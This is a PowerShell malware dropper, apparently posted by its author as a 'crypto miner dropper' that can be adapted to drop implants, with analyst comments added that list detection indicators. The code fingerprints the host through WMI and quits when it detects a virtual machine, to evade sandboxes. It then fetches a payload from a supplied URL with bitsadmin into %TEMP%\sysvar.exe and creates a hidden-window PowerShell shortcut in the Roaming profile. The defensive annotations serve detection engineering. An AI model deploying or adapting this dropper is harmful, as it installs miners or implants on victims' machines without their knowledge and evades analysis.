Custom implant dropper
# Analyst annotations (defensive). This listing is a Windows PowerShell downloader/dropper
# preserved exactly as posted, for detection engineering and triage; the upstream "shell"
# language label is wrong. The code is left untouched. The comments added below record only
# what the script observably does and which host/network artifacts a defender can hunt for.
| # Crypto miner dropper or you can modify it to drop your implants | |
| # Read the code if you want to figure it out | |
# Inputs: $Url (positional, string[]) is the download source handed to bitsadmin below;
# $64Url is a second declared string parameter.
| param( | |
| [Parameter(Position = 0)] | |
| [string[]]$Url, | |
| [string]$64Url | |
| ) | |
# Host fingerprinting via WMI: BIOS version/serial number and system model/manufacturer.
# Detection: Win32_BIOS plus Win32_ComputerSystem queries issued by a PowerShell host
# process at startup are a common VM/sandbox-check pattern (visible in the
# Microsoft-Windows-WMI-Activity operational log and in PowerShell script-block logging).
| $wmibios = Get-WmiObject Win32_BIOS -ErrorAction Stop | Select-Object version,serialnumber | |
| $wmisystem = Get-WmiObject Win32_ComputerSystem -ErrorAction Stop | Select-Object model,manufacturer | |
# Fingerprint record. The hardware fields come from the two WMI queries above;
# IsVirtual / VirtualType are filled in by the checks that follow.
| $Detect = @{ | |
| ComputerName = $computer | |
| BIOSVersion = $wmibios.Version | |
| SerialNumber = $wmibios.serialnumber | |
| Manufacturer = $wmisystem.manufacturer | |
| Model = $wmisystem.model | |
| IsVirtual = $false | |
| VirtualType = $null | |
| } | |
# VM / sandbox classification. Vendor strings tested: BIOS serial "*VMware*"; BIOS version
# against 'VIRTUAL' (labelled Hyper-V), 'A M I' (labelled Virtual PC) and '*Xen*'; and,
# if still unclassified, system manufacturer "*VMWare*".
# Defender note: an analysis VM that exposes these vendor identifiers will be classified
# as virtual by this sample, so detonation environments may need to present neutral
# BIOS/manufacturer strings to observe the later stages.
| if ($wmibios.SerialNumber -like "*VMware*") { | |
| $Detect.IsVirtual = $true | |
| $Detect.VirtualType = "Virtual - VMWare" | |
| } | |
| else { | |
| switch -wildcard ($wmibios.Version) { | |
| 'VIRTUAL' { | |
| $Detect.IsVirtual = $true | |
| $Detect.VirtualType = "Virtual - Hyper-V" | |
| } | |
| 'A M I' { | |
| $Detect.IsVirtual = $true | |
| $Detect.VirtualType = "Virtual - Virtual PC" | |
| } | |
| '*Xen*' { | |
| $Detect.IsVirtual = $true | |
| $Detect.VirtualType = "Virtual - Xen" | |
| } | |
| } | |
| } | |
| if (-not $Detect.IsVirtual) { | |
| if ($wmisystem.manufacturer -like "*VMWare*") | |
| { | |
| $Detect.IsVirtual = $true | |
| $Detect.VirtualType = "Virtual - VMWare" | |
| } | |
| } | |
# The fingerprint is wrapped in a PSObject and appended to $results; nothing in this
# listing reads $results afterwards.
| $results += New-Object PsObject -Property $Detect # " Using += Operator" | |
# Per the author's own comment on the exit line, this loop is intended as the anti-VM
# gate: terminate instead of proceeding when the host was classified as virtual.
| while ($true) # while loop | |
| { | |
| if ($Detect.IsVirtual = $true ) | |
| { | |
| exit; # if VM detected | |
| } | |
| } | |
# Connectivity gate: Test-Connection (ICMP echo, 6 attempts per call) against
# www.google.com is retried until it succeeds or the stopwatch exceeds $Timeout seconds.
# Detection: a burst of ICMP echo requests to www.google.com from powershell.exe right
# after the WMI hardware queries above.
| $timer = [Diagnostics.Stopwatch]::StartNew() | |
| while (-not (Test-Connection www.google.com -Quiet -Count 6)) #checks if connected to internet | |
| { | |
| if ($timer.Elapsed.TotalSeconds -ge $Timeout) | |
| { | |
| exit; | |
| } | |
| else | |
| { | |
| } | |
# Architecture branch on Win32_OperatingSystem.OSArchitecture. Both the 64-bit and the
# 32-bit branch stage the same two artifacts, which are the primary hunting indicators:
#  - Payload download: bitsadmin.exe /transfer with job display name "transaction",
#    writing $url to %TEMP%\sysvar.exe. Hunt for bitsadmin.exe command lines containing
#    "/transfer" and "/download", for Microsoft-Windows-Bits-Client operational log
#    entries created by a PowerShell parent, and for a file named sysvar.exe in a user's
#    TEMP directory.
#  - Launcher shortcut: a WScript.Shell COM object (wshom.ocx) writes
#    %USERPROFILE%\AppData\Roaming\slavyana.lnk targeting
#    %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe, with a Shell32.dll icon
#    (index 21) and "-windowstyle hidden" arguments. Hunt for .lnk files in the root of
#    the Roaming profile whose target is powershell.exe with hidden-window arguments, and
#    for powershell.exe loading wshom.ocx, which is uncommon in ordinary user sessions.
| $os_type = (Get-WmiObject -Class Win32_OperatingSystem).OSArchitecture -match ‘(64-bit)’ | |
| if ($os_type -eq "True") | |
| { | |
| bitsadmin /transfer transaction /download /priority HIGH $url %TEMP%\sysvar.exe | |
| #wmic process call create %TEMP%\sysvar.exe --arguments (64-bit) | |
| #Creates shortcut with miner arguments | |
| $WshShell = New-Object -comObject WScript.Shell | |
| $Shortcut = $WshShell.CreateShortcut($env:USERPROFILE + "\AppData\Roaming\slavyana.lnk") | |
| $Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" | |
| $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" | |
| $Shortcut.Arguments = '-windowstyle hidden /c --arguments' | |
| $Shortcut.Save() | |
| #powershell.exe -file -windowsstyle hidden ./slavyana.lnk | |
| } | |
| else | |
| { | |
# 32-bit branch: identical download and shortcut steps, same file names and paths as
# above, so the indicators listed there cover both architectures.
| $os_type = (Get-WmiObject -Class Win32_OperatingSystem).OSArchitecture -match ‘(32-bit)’ | |
| if ($os_type -eq "True") | |
| { | |
| bitsadmin /transfer transaction /download /priority HIGH $url %TEMP%\sysvar.exe | |
| #wmic process call create %TEMP%\sysvar.exe --arguments (32-bit) | |
| $WshShell = New-Object -comObject WScript.Shell | |
| $Shortcut = $WshShell.CreateShortcut($env:USERPROFILE + "\AppData\Roaming\slavyana.lnk") | |
| $Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" | |
| $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" | |
| $Shortcut.Arguments = '-windowstyle hidden /c --arguments' | |
| $Shortcut.Save() | |
| # powershell.exe -file -windowsstyle hidden ./slavyana.lnk | |
| } | |
| } | |